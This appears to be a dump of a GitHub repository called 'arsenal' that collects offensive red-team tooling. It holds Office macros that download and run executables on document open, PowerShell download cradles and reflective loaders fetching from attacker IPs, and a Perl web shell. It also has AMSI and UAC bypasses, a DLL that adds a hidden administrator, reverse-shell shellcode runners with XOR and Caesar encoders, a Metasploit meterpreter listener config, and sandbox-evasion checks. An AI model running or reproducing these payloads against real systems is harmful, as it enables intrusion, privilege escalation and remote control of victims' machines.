├── README.md
├── psh
├── ReflectiveDllB64.ps1
├── ReflectiveDllDisk.ps1
├── ReflectiveDllFetch.ps1
├── csharp_compile.ps1
├── UAC-Bypass-fodhelper.ps1
├── Invoke-LnkGen.ps1
├── EncodeCaesar.ps1
├── Invoke-IsoGen.ps1
├── ReflectiveScRunnerLookup.ps1
├── SqlCmd.ps1
├── AmsiBypass-AmsiOpenSession.ps1
├── AmsiBypass-AmsiScanBuffer.ps1
├── ReflectiveScRunnerPInvoke.ps1
├── ReflectiveScInject.ps1
├── Invoke-Rbcd.ps1
├── New-IsoFile.ps1
├── BadWords.txt
└── Test-LDAP.ps1
├── perl
├── upload.pl
├── cmd.pl
└── rundll.pl
├── wsh
├── Stub-DechainedWmi.vb
├── Stub-Sleep.vb
├── cmd.hta
├── Jscript-Cmd.xsl
├── Amsi-Enable-Bypass.js
├── Stub-DecimalDecryptor.vb
├── Amsi-Imposter-Bypass.js
├── PshDownloadExec.vb
├── Stub-Dechained-02.vb
├── DownloadAlt.vb
├── InMemoryWin32CreateThread.vb
├── RunnerDecimalObfsNameCheck.vb
├── DownloadExec.vb
├── InMemoryWin32CreateThread-SleepyCaesar.vb
├── g2js-vbascriptb64_template.vba
└── g2js-htascript_template.hta
├── csharp
├── Sleep.cs
├── Guardrail-FlsAlloc.cs
├── ClassReflectiveDllPoc.cs
├── Guardrail-ExNuma.cs
├── Telerik-MixedMode-Assembly-Runner.cs
├── SharpResolver.cs
├── SharpHttpFetch.cs
├── GzipBuffer.cs
├── Reflective-Dll-Runner.cs
├── Reflective-PE-Runner.cs
├── Guardrail-MininumBrowsersChecker.cs
├── AddUserAdmin.cs
├── ClassSayMyName.cs
├── ScRunner.cs
├── SharpDllPoc.cs
├── UninstallerRunspaceBypass.cs
├── UninstallerReflectiveDllLoader.cs
├── UninstallerReflectivePELoader.cs
├── DllInject.cs
├── RunspaceBypass.cs
├── ScInject.cs
├── PsExecLess.cs
├── XorString.cs
├── BufferOverflowPoc.cs
└── DInvokeScRunner.cs
├── py
├── rundll.py
├── request_shell.py
└── DotNetNuke-Cookie-Deserialization.py
├── conf
├── apache-ssl.conf
├── msf-https-listener.rc
└── nginx-redirector.conf
├── c
├── Guardrail-isDomainJoined.c
├── exec_dll-winapi.c
├── ScRunnerCaesar.c
├── ScRunner.c
├── ScXorEncoder.c
├── ScRunnerXor.c
├── ScCaesarEncoder.c
├── exec_dll-apientry.c
├── SharedPreLoad.c
└── windows
│ ├── xor_test.c
│ └── inflate.c
├── cpp
├── Guardrail-SayMyName.cpp
├── DllScInject.cpp
├── DllScHollow.cpp
└── CppCplRunner.cpp
├── msbuild
├── MSBuild-Csharp-x64.xml
├── WorflowCompilerXmlGenerator.ps1
├── WorkflowCompiler-Reflective-PE-Runner.cs
├── MSBuild-RunspaceBypass-x64.xml
├── WorkFlowCompiler.xml
├── MSBuild-RunspaceBypass-Interactive-x64.xml
└── MSBuild-Hollow-Runner-x64.xml
├── misc
├── HtmlSmuggling.html
└── ScRunner.aspx
└── infra
└── Dockerfile.ollvm
/README.md:
--------------------------------------------------------------------------------
1 | # arsenal
2 |
3 | miscellaneous sploit scripts/hacks & stubs
4 |
--------------------------------------------------------------------------------
/psh/ReflectiveDllB64.ps1:
--------------------------------------------------------------------------------
1 | $b64 = "..."
2 | [System.Reflection.Assembly]::Load([Convert]::FromBase64String($b64))
3 | [ClassMyMiniDump.Class1]::runner()
4 |
--------------------------------------------------------------------------------
/perl/upload.pl:
--------------------------------------------------------------------------------
1 | #!/bin/perl
2 | use LWP::Simple;
3 |
4 | if ($#ARGV == 1)
5 | {
6 | print "saving " . $ARGV[0] . " as " . $ARGV[1] . "\n";
7 | print getstore($ARGV[0], $ARGV[1]);
8 | }
--------------------------------------------------------------------------------
/psh/ReflectiveDllDisk.ps1:
--------------------------------------------------------------------------------
1 | $dll = [System.IO.File]::ReadAllBytes("C:\temp\evil.dll"); [System.Reflection.Assembly]::Load($dll); [System.Reflection.Assembly]::Load($dll) ; [ClassLibrary1.Class1]::runner()
--------------------------------------------------------------------------------
/psh/ReflectiveDllFetch.ps1:
--------------------------------------------------------------------------------
1 | $dll = (new-object net.webclient).DownloadData("http://192.168.49.83/ClassLibrary1-x86.dll")
2 | [System.Reflection.Assembly]::Load($dll)
3 | [ClassLibrary1.Class1]::runner()
4 |
--------------------------------------------------------------------------------
/wsh/Stub-DechainedWmi.vb:
--------------------------------------------------------------------------------
1 | Sub MyMacro
2 | strArg = "powershell"
3 | GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
4 | End Sub
5 |
6 | Sub AutoOpen()
7 | MyMacro
8 | End Sub
--------------------------------------------------------------------------------
/csharp/Sleep.cs:
--------------------------------------------------------------------------------
1 | static extern void Sleep(uint dwMilliseconds);
2 | // main
3 | DateTime t1 = DateTime.Now;
4 | Sleep(2000);
5 | double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
6 | if (t2 < 1.5)
7 | {
8 | return;
9 | }
10 |
--------------------------------------------------------------------------------
/wsh/Stub-Sleep.vb:
--------------------------------------------------------------------------------
1 | ' sleep
2 | Dim t1 As Date
3 | Dim t2 As Date
4 | Dim time As Long
5 |
6 | t1 = Now()
7 | Sleep (2000)
8 | t2 = Now()
9 | time = DateDiff("s", t1, t2)
10 | If time < 2 Then
11 | Exit Function
12 | End If
--------------------------------------------------------------------------------
/psh/csharp_compile.ps1:
--------------------------------------------------------------------------------
1 | Add-Type -OutputAssembly hello.exe -TypeDefinition @'
2 | using System;
3 |
4 | public class Hello {
5 | public static void Main(string[] Args) {
6 | System.Console.WriteLine("yolo");
7 | }
8 | }
9 | '@
--------------------------------------------------------------------------------
/perl/cmd.pl:
--------------------------------------------------------------------------------
1 | #!/bin/perl
2 | print "HTTP/1.0 200 OK\n";
3 | print "Content-Type: text/html\n\n\n";
4 |
5 | my $color = $ENV{QUERY_STRING};
6 | chomp ($color);
7 | $color =~ s/%20/ /g;
8 | $color =~ s/%3b/;/g;
9 |
10 | system $color;
11 | exit(0);
--------------------------------------------------------------------------------
/py/rundll.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # source: https://twitter.com/chvancooten/status/1418969800823513093
3 | # execute unmanaged dll via its EntryPoint, context will be python.exe
4 | import ctypes
5 |
6 | result = ctypes.WinDLL("c:\\windows\\tasks\\exec.dll")
7 | result.Update()
8 |
9 | quit()
--------------------------------------------------------------------------------
/csharp/Guardrail-FlsAlloc.cs:
--------------------------------------------------------------------------------
1 | [DllImport("kernel32.dll", SetLastError = true)]
2 | static extern IntPtr FlsAlloc(IntPtr callback);
3 | static void Main(string[] args)
4 | {
5 | IntPtr mem = FlsAlloc(IntPtr.Zero);
6 | if (mem == null)
7 | {
8 | return;
9 | }
10 | [...]
--------------------------------------------------------------------------------
/wsh/cmd.hta:
--------------------------------------------------------------------------------
1 |
2 |
3 |
7 |
8 |
9 | Test
10 |
13 |
14 |
--------------------------------------------------------------------------------
/psh/UAC-Bypass-fodhelper.ps1:
--------------------------------------------------------------------------------
1 | New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "c:\users\vic\desktop\hollow.exe" –Force
2 |
3 | New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
4 |
5 | C:\Windows\System32\fodhelper.exe
6 |
--------------------------------------------------------------------------------
/perl/rundll.pl:
--------------------------------------------------------------------------------
1 | use Win32::API;
2 |
3 | # rundll32.pl - load dll with perl
4 | # @thelikes_
5 | # help: https://stackoverflow.com/questions/45059300/win32api-giving-wrong-prototype-error
6 | # sample dll: https://github.com/thelikes/arsenal/blob/main/c/exec_dll-2.c
7 |
8 | $function = Win32::API->new("c:\\payloads\\exec_dll\\output\\exec_dll64.dll", "DllMain",[ 'N', 'P', 'P' ], 'N', '__cdecl');
9 |
10 | exit(0);
--------------------------------------------------------------------------------
/wsh/Jscript-Cmd.xsl:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
8 |
9 |
10 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/wsh/Amsi-Enable-Bypass.js:
--------------------------------------------------------------------------------
1 | var sh = new ActiveXObject('WScript.Shell');
2 | var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
3 | try{
4 | var AmsiEnable = sh.RegRead(key);
5 | if(AmsiEnable!=0){
6 | throw new Error(1, '');
7 | }
8 | }catch(e){
9 | sh.RegWrite(key, 0, "REG_DWORD");
10 | sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
11 | sh.RegWrite(key, 1, "REG_DWORD");
12 | WScript.Quit(1);
13 | }
--------------------------------------------------------------------------------
/wsh/Stub-DecimalDecryptor.vb:
--------------------------------------------------------------------------------
1 | Function Pears(Beets)
2 | Pears = Chr(Beets - 17)
3 | End Function
4 |
5 | Function Strawberries(Grapes)
6 | Strawberries = Left(Grapes, 3)
7 | End Function
8 |
9 | Function Almonds(Jelly)
10 | Almonds = Right(Jelly, Len(Jelly) - 3)
11 | End Function
12 |
13 | Function Nuts(Milk)
14 | Do
15 | Oatmilk = Oatmilk + Pears(Strawberries(Milk))
16 | Milk = Almonds(Milk)
17 | Loop While Len(Milk) > 0
18 | Nuts = Oatmilk
19 | End Function
--------------------------------------------------------------------------------
/csharp/ClassReflectiveDllPoc.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | /*
4 | * DLL PoC
5 | * Psh reflective load:
6 | * > $dll = [System.IO.File]::ReadAllBytes("C:\MsgLib\bin\x64\Release\MsgLib.dll"); [System.Reflection.Assembly]::Load($dll); [System.Reflection.Assembly]::Load($dll) ; [MsgLib.MsgClass]::Start()
7 | */
8 |
9 | namespace MsgLib
10 | {
11 | public class MsgClass
12 | {
13 | public static void Start()
14 | {
15 | Console.WriteLine("Executed!");
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/wsh/Amsi-Imposter-Bypass.js:
--------------------------------------------------------------------------------
1 | var filesys= new ActiveXObject("Scripting.FileSystemObject");
2 | var sh = new ActiveXObject('WScript.Shell');
3 | try
4 | {
5 | if(filesys.FileExists("C:\\Windows\\Tasks\\AMSI.dll")==0)
6 | {
7 | throw new Error(1, '');
8 | }
9 | }
10 | catch(e)
11 | {
12 | filesys.CopyFile("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\Tasks\\AMSI.dll");
13 | sh.Exec("C:\\Windows\\Tasks\\AMSI.dll -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName);
14 | WScript.Quit(1);
15 | }
--------------------------------------------------------------------------------
/psh/Invoke-LnkGen.ps1:
--------------------------------------------------------------------------------
1 | # https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk
2 |
3 | $obj = New-object -comobject wscript.shell
4 | # output file
5 | $link = $obj.createshortcut("c:\payloads\nobelium\Documents.lnk")
6 | $link.windowstyle = "7"
7 | $link.targetpath = "C:\Windows\System32\cmd.exe"
8 | # predefined lnk icon
9 | $link.iconlocation = "C:\program files (x86)\microsoft\edge\application\msedge, 13"
10 | # command to execute
11 | $link.arguments = '/c "start https://example.com/legit.pdf && rundll32 .\evil.dll,DllMain"'
12 | $link.save()
13 |
--------------------------------------------------------------------------------
/csharp/Guardrail-ExNuma.cs:
--------------------------------------------------------------------------------
1 | class Program {
2 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
3 |
4 | [DllImport("kernel32.dll")]
5 | static extern IntPtr GetCurrentProcess();
6 |
7 | static void Main(string[] args)
8 | {
9 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4,0);
10 | if (mem == null)
11 | {
12 | // bail
13 | return;
14 | }
15 |
16 | // now do stuff
17 | return;
18 | }
19 | }
--------------------------------------------------------------------------------
/psh/EncodeCaesar.ps1:
--------------------------------------------------------------------------------
1 | $payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))"
2 |
3 | [string]$output = ""
4 |
5 | $payload.ToCharArray() | %{
6 | [string]$thischar = [byte][char]$_ + 17
7 | if($thischar.Length -eq 1)
8 | {
9 | $thischar = [string]"00" + $thischar
10 | $output += $thischar
11 | }
12 | elseif($thischar.Length -eq 2)
13 | {
14 | $thischar = [string]"0" + $thischar
15 | $output += $thischar
16 | }
17 | elseif($thischar.Length -eq 3)
18 | {
19 | $output += $thischar
20 | }
21 | }
22 |
23 | Write-Host $output
--------------------------------------------------------------------------------
/conf/apache-ssl.conf:
--------------------------------------------------------------------------------
1 | # enable ssh module
2 | # a2enmod ssl
3 |
4 | # /etc/sites-available/somesite.conf
5 |
6 |
7 | ServerName some.site.com
8 | ServerAdmin webmaster@localhost
9 |
10 | DocumentRoot /var/www/html/
11 | DirectoryIndex index.php index.html
12 |
13 | ErrorLog ${APACHE_LOG_DIR}/web_delivery-www-error.log
14 | CustomLog ${APACHE_LOG_DIR}/web_delivery-www-access.log combined
15 |
16 | SSLEngine on
17 | SSLCertificateFile /etc/letsencrypt/live/some.site.com/fullchain.pem
18 | SSLCertificateKeyFile /etc/letsencrypt/live/some.site.com/privkey.pem
19 |
20 |
--------------------------------------------------------------------------------
/conf/msf-https-listener.rc:
--------------------------------------------------------------------------------
1 | use exploit/multi/handler
2 | set payload windows/x64/meterpreter/reverse_winhttps
3 | set LHOST fw.vaultsec.xyz
4 | set LPORT 443
5 | set EXITFUNC thread
6 | set verbose true
7 | set EnableStageEncoding true
8 | set StageEncoder x64/xor_dynamic
9 | set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.42"
10 | set HttpServerName Nginx
11 | set HandlerSSLCert /etc/letsencrypt/live/fw.vaultsec.xyz/unified.pem
12 | set HttpUnknownRequestResponse "zzz
"
13 | set HttpCookie "PHPSESS: 112391323913"
14 | set HttpReferer "https://fw.vaultsec.xyz/status?t=1aIIt2313"
15 | set ExitOnSession false
16 | exploit -j
17 |
--------------------------------------------------------------------------------
/c/Guardrail-isDomainJoined.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | /*
7 | * Guardrail to determine if a system is domain joined.
8 | * @thelikes
9 | */
10 |
11 | bool isDomainJoined() {
12 | DWORD bufSize = MAX_PATH;
13 | TCHAR domainNameBuf[ MAX_PATH ];
14 |
15 | GetComputerNameEx( ComputerNameDnsDomain, domainNameBuf, &bufSize );
16 |
17 | //printf("name: %s", domainNameBuf);
18 |
19 | if (domainNameBuf[0] != '\0')
20 | {
21 | return true;
22 | }
23 |
24 | return false;
25 | }
26 |
27 | int main() {
28 | if (isDomainJoined()) {
29 | printf("true");
30 | } else {
31 | printf("false");
32 | }
33 |
34 | return 0;
35 | }
--------------------------------------------------------------------------------
/psh/Invoke-IsoGen.ps1:
--------------------------------------------------------------------------------
1 | # source: https://gist.githubusercontent.com/mgraeber-rc/a780834c983bc0d53121c39c276bd9f3/raw/94e9e4b685f03bb0dadc5a6516948c1c55c5e080/SimulateInternetZoneTest.ps1
2 |
3 | # Usage:
4 | # 1) create a directory and populate its contents with files intended to be enclosed in the ISO/IMG
5 | # 2) configure the image name, parcel title, and iso directory
6 | # 3) run
7 | $eviliso = "Documents.iso"
8 | $isodir = "Documents"
9 | $parceltitle = "Documents"
10 |
11 | # Create an ISO file from the $isodir directory.
12 | (New-Object net.webclient).DownloadString('https://raw.githubusercontent.com/wikijm/PowerShell-AdminScripts/master/Miscellaneous/New-IsoFile.ps1')|iex
13 | ls -Force $isodir | New-IsoFile -Path $eviliso -Media CDR -Title $parceltitle
14 |
--------------------------------------------------------------------------------
/cpp/Guardrail-SayMyName.cpp:
--------------------------------------------------------------------------------
1 | // SOURCE: https://gist.github.com/benheise/ad7f2adb605a7ec216a506e821705a06
2 | // quick and dirty C++ execution guardrail on executing process file name, inspired by @0xHop av evasion post
3 | // https://0xhop.github.io/evasion/2021/04/19/evasion-pt1/
4 |
5 | #include
6 | #include
7 |
8 |
9 | // Hide the console window
10 | //ShowWindow (GetConsoleWindow(), SW_HIDE);
11 |
12 | // compare current and expected process name, exit if they don't match (ie executing in a sandbox)
13 | TCHAR szName[MAX_PATH];
14 | char ourName[] = "evade.exe";
15 | GetModuleBaseName(GetCurrentProcess(), GetModuleHandle(NULL), szName, MAX_PATH);
16 |
17 | // if they dont match, exit. otherwise get this party started
18 | if (strcmp(ourName, szName) != 0) {
19 | exit(STATUS_SUCCESS);
20 | }
--------------------------------------------------------------------------------
/msbuild/MSBuild-Csharp-x64.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
9 |
10 |
11 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/c/exec_dll-winapi.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // compile:
6 | // "c:\MinGW\bin\mingw32-g++.exe" -Wall -DBUILD_DLL -O2 -c exec_dll.c -o exec_dll.o
7 | // "c:\MinGW\bin\mingw32-g++.exe" -shared -Wl,--dll exec_dll.o -o exec_dll.dll
8 |
9 | int Exploit()
10 | {
11 | WinExec("cmd.exe /c net user spook Summer2021! /add",0);
12 | WinExec("cmd.exe /c net localgroup administrators spook /add", 0);
13 | return 0;
14 | }
15 |
16 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
17 | {
18 | switch (fdwReason)
19 | {
20 | case DLL_PROCESS_ATTACH:
21 | Exploit();
22 | break;
23 | case DLL_THREAD_ATTACH:
24 | break;
25 | case DLL_THREAD_DETACH:
26 | break;
27 | case DLL_PROCESS_DETACH:
28 | break;
29 | }
30 | return TRUE;
31 | }
--------------------------------------------------------------------------------
/c/ScRunnerCaesar.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main (int argc, char **argv)
6 | {
7 | unsigned char buf[] = "\x4C\x35\x03\x6E\x0D\x5C\x9D\xBA\x14\x4C\x8D\xDA\x51\x35\xCD\x6E\x26\x45\x5E\xB6\x0B\x13\x09\x4C\x89\xC4\x7C\x55\x6E\x0E\x45\x5D\x54\x6E\x2D\x5C\x9D\x6E\x06\x63\x6E\x05\x62\x13\x09\x4C\x89\xC4\x7C\x3F\x4C\x9B\x4C\xBD\x06\x04\x23\x94\xC4\xAC\x35\x57\x55\x4C\x8D\xEA\x6E\x14\x5E\x6E\x2E\x5C\x13\x09\x5D\x4C\x89\xC4\x7D\x29\x4D\x03\xCD\x78\x1C\x5B\x6E\x27\x5C\x6E\x04\x6E\x09\x4C\x8D\xEB\x4C\x35\xFA\x13\x09\x5D\x5D\x63\x4C\x89\xC4\x7D\xCB\x6E\x40\x5C\x6E\x05\x63\x13\x09\x62\x6E\x82\x5E\x13\x09\x4C\x89\xC4\x7C\xF1\x03\xEA\x04";
8 | int buflen = (int) sizeof(buf);
9 |
10 | for (int i=0; i
2 | #include
3 | #include
4 |
5 | // compile
6 | // gcc -o ScRunner.out ScRunner.c -z execstack
7 |
8 | int main (int argc, char **argv)
9 | {
10 | unsigned char buf[] =
11 | "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
12 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
13 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
14 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x00\x50\xc0\xa8"
15 | "\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
16 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
17 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
18 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
19 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
20 |
21 | int (*ret)() = (int(*)())buf;
22 | ret();
23 | }
24 |
--------------------------------------------------------------------------------
/wsh/PshDownloadExec.vb:
--------------------------------------------------------------------------------
1 | Sub Document_Open()
2 | MyMacro
3 | End Sub
4 |
5 | Sub AutoOpen()
6 | MyMacro
7 | End Sub
8 |
9 | Sub MyMacro()
10 | Dim str As String
11 | str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.83/esrl.exe','esrl.exe')"
12 | Shell str, vbHide
13 |
14 | ' Luckily, downloaded content will end up in the current folder of the Word document and we can obtain the path name with the ActiveDocument.Path
15 | Dim exePath As String
16 | ' Word
17 | exePath = ActiveDocument.Path + "\esrl.exe"
18 | ' Excel
19 | ' exePath = Application.ActiveWorkbook.path + "\esrl.exe"
20 | Wait (2)
21 | Shell exePath, vbHide
22 | End Sub
23 |
24 | ' introduce delay as download time my vary
25 | Sub Wait(n As Long)
26 | Dim t as Date
27 | t = Now
28 | Do
29 | DoEvents
30 | Loop Until Now >= DateAdd("s", n, t)
31 | End Sub
--------------------------------------------------------------------------------
/csharp/Telerik-MixedMode-Assembly-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.Collections;
4 | using System.Collections.Specialized;
5 |
6 | // can be used to test mixed mode assembly payloads for the Telerik UI RCE (https://github.com/noperator/CVE-2019-18935)
7 | // usage: .\TestAssemblyInstaller.exe payloads\reverse-shell-2021040215111429-amd64.dll
8 |
9 | namespace TestAssemblyInstaller
10 | {
11 | class Program
12 | {
13 | static void Main(string[] args)
14 | {
15 | string path = args[0];
16 | string[] commandLineOptions = new string[0];
17 |
18 | using (var installer = new AssemblyInstaller(path, commandLineOptions))
19 | {
20 | installer.UseNewContext = true;
21 | installer.Install(null);
22 | installer.Commit(null);
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/c/ScXorEncoder.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | unsigned char buf[] =
6 | "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
7 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
8 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
9 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x00\x50\xc0\xa8"
10 | "\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
11 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
12 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
13 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
14 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
15 |
16 | int main (int argc, char **argv)
17 | {
18 | char xor_key = 'J';
19 | int payload_length = (int) sizeof(buf);
20 |
21 | for (int i=0; i
2 | #include
3 | #include
4 |
5 | // compile
6 | // gcc -o ScRunner.out ScRunner.c -z execstack
7 |
8 |
9 | int main (int argc, char **argv)
10 | {
11 | unsigned char buf[] = "\x02\x7B\xB5\x20\x43\x12\xD3\xFC\x5A\x02\xC3\x9C\x07\x7B\x83\x20\x68\x0B\x10\xF8\x4D\x45\x4F\x02\xCF\x8A\x32\x1B\x20\x40\x0B\x13\x1A\x20\x63\x12\xD3\x20\x48\x15\x20\x4B\x14\x45\x4F\x02\xCF\x8A\x32\x71\x02\xDD\x02\xF3\x48\x4A\x4A\x1A\x8A\xE2\x7B\x19\x1B\x02\xC3\xAC\x20\x5A\x10\x20\x60\x12\x45\x4F\x13\x02\xCF\x8A\x33\x6F\x03\xB5\x83\x3E\x52\x1D\x20\x69\x12\x20\x4A\x20\x4F\x02\xC3\xAD\x02\x7B\xBC\x45\x4F\x13\x13\x15\x02\xCF\x8A\x33\x8D\x20\x76\x12\x20\x4B\x15\x45\x4F\x14\x20\x34\x10\x45\x4F\x02\xCF\x8A\x32\xA7\xB5\xAC\x4A";
12 |
13 | char xor_key = 'J';
14 | int arraysize = (int) sizeof(buf);
15 | for (int i=0; i dt): Loop
17 | objFSO.DeleteFile p
18 |
--------------------------------------------------------------------------------
/c/ScCaesarEncoder.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main (int argc, char **argv)
6 | {
7 | unsigned char buf[] =
8 | "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
9 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
10 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
11 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x1f\x90\xc0\xa8"
12 | "\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
13 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
14 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
15 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
16 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
17 | int buflen = (int) sizeof(buf);
18 |
19 | printf("buflen: %d\n", buflen);
20 |
21 | printf("Encoded: ");
22 | for (int i=0; i] SharpResolver.exe ");
13 | return;
14 | }
15 |
16 | string iLib = args[0];
17 | string iFun = args[1];
18 |
19 | IntPtr loadlib = GetProcAddress(LoadLibrary(iLib), iFun);
20 |
21 | Console.WriteLine("[>] Resolving: " + iLib + "!" + iFun);
22 | Console.WriteLine(string.Format("[>] Address: 0x{0:X}", loadlib.ToInt32()));
23 | }
24 | [DllImport("kernel32")]
25 | public static extern IntPtr LoadLibrary(string name);
26 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
27 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/psh/ReflectiveScRunnerLookup.ps1:
--------------------------------------------------------------------------------
1 | $Kernel32 = @"
2 | using System;
3 | using System.Runtime.InteropServices;
4 |
5 | public class Kernel32 {
6 | [DllImport("kernel32")]
7 | public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
8 | [DllImport("kernel32", CharSet=CharSet.Ansi)]
9 | public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
10 | [DllImport("kernel32.dll", SetLastError=true)]
11 | public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
12 | }
13 | "@
14 |
15 | Add-Type $Kernel32
16 |
17 | [Byte[]] $buf = 0xfc,[...],0xd5
18 |
19 | $size = $buf.Length
20 |
21 | [IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size,0x3000,0x40);
22 |
23 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)
24 |
25 | $thandle = [Kernel32]::CreateThread(0,0,$addr,0,0,0);
26 |
27 | [Kernel32]::WaitForSingleObject($tHandle, [uint32]"0xFFFFFFFF")
--------------------------------------------------------------------------------
/msbuild/WorflowCompilerXmlGenerator.ps1:
--------------------------------------------------------------------------------
1 | $workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
2 |
3 | $workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
4 |
5 | $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
6 |
7 | Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
8 |
9 | $compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
10 |
11 | $compilerparam.GenerateInMemory = $True
12 |
13 | $pathvar = "test.txt"
14 | $output = "C:\Tools\run.xml"
15 |
16 | $tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))
17 |
18 | Move-Item $tmp $output
19 |
20 | $Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“student”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl
--------------------------------------------------------------------------------
/psh/SqlCmd.ps1:
--------------------------------------------------------------------------------
1 | $Target = "tar.dom.local"
2 | $Link = "SQL01"
3 | $Command = "calc.exe"
4 |
5 | $sqlConnection = New-Object System.Data.SqlClient.SqlConnection
6 | $sqlConnection.ConnectionString = "Server=$Target;Database=master;Integrated Security=True"
7 | $sqlConnection.Open()
8 | $sqlCmd = New-Object System.Data.SqlClient.SqlCommand
